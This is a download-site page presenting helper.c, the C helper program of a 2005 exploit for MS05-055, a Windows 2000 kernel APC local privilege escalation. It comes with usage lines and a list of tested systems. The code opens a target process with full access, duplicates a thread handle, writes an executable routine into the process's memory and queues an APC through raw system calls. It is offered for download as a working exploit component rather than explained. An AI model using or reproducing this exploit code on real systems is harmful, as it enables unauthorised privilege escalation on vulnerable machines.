⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 helper.c

📁 微软MS05-055漏洞利用程序
💻 C
字号:
🔍 
/*
	MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
			Created by SoBeIt
					12.25.2005

	Helper file of exploit

	Tested on:

	Windows 2000 PRO SP4 Chinese
	Windows 2000 PRO SP4 Rollup 1 Chinese
	Windows 2000 PRO SP4 English
	Windows 2000 PRO SP4 Rollup 1 English

	Usage:ms05-055.exe helper.exe
*/


#include <stdio.h>
#include <windows.h>

#define NTSTATUS	ULONG

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);

__declspec(naked)
NTSTATUS
NTAPI
ZwQueueApcThread(
	HANDLE hThread,
	PKNORMAL_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PVOID Argument1,
	PVOID Argument2)
{
	__asm
	{
		mov eax, 0x9e
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

__declspec(naked)
NTSTATUS
ZwAlertThread(
	HANDLE hThread)
{
	__asm
	{
		mov eax, 0x0c
		lea edx, [esp+4]
		int 0x2e
		ret 0x4
	}
}

VOID NTAPI ApcProc(PVOID ApcContext, PVOID Argument1, PVOID Argument2)
{
}

int main(int argc, char *argv[])
{
	HANDLE	hTargetThread, hTargetProcess, hThread;
	int		ProcessId;
	PVOID	pApcProc;

	if(argc != 3)
	{
		printf(" Usage:ms05-055.exe helper.exe. \n");
		return 1;
	}

	hTargetThread = (HANDLE)atoi(argv[1]);
	ProcessId = atoi(argv[2]);
	printf("Got thread handle:%x, Got process id:%x\n", hTargetThread, ProcessId);
	hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
	printf("Process handle:%x\n", hTargetProcess);
	if(!DuplicateHandle(hTargetProcess, hTargetThread, GetCurrentProcess(),  &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS))
		printf("Duplicate handle failed.\n");

	if((pApcProc = VirtualAllocEx(hTargetProcess, 0, 1024*4, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
		printf("Allocate remote memory failed.\n");

	if(!WriteProcessMemory(hTargetProcess, pApcProc, &ApcProc, 1024*4, 0))
		printf("Write remote memory failed.\n");

	ZwAlertThread(hThread);
	ZwQueueApcThread(hThread, (PKNORMAL_ROUTINE)pApcProc, NULL, NULL, NULL);
	CloseHandle(hTargetProcess);
	CloseHandle(hThread);
	printf("Now terminating process.\n");
	ExitProcess(0);
}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -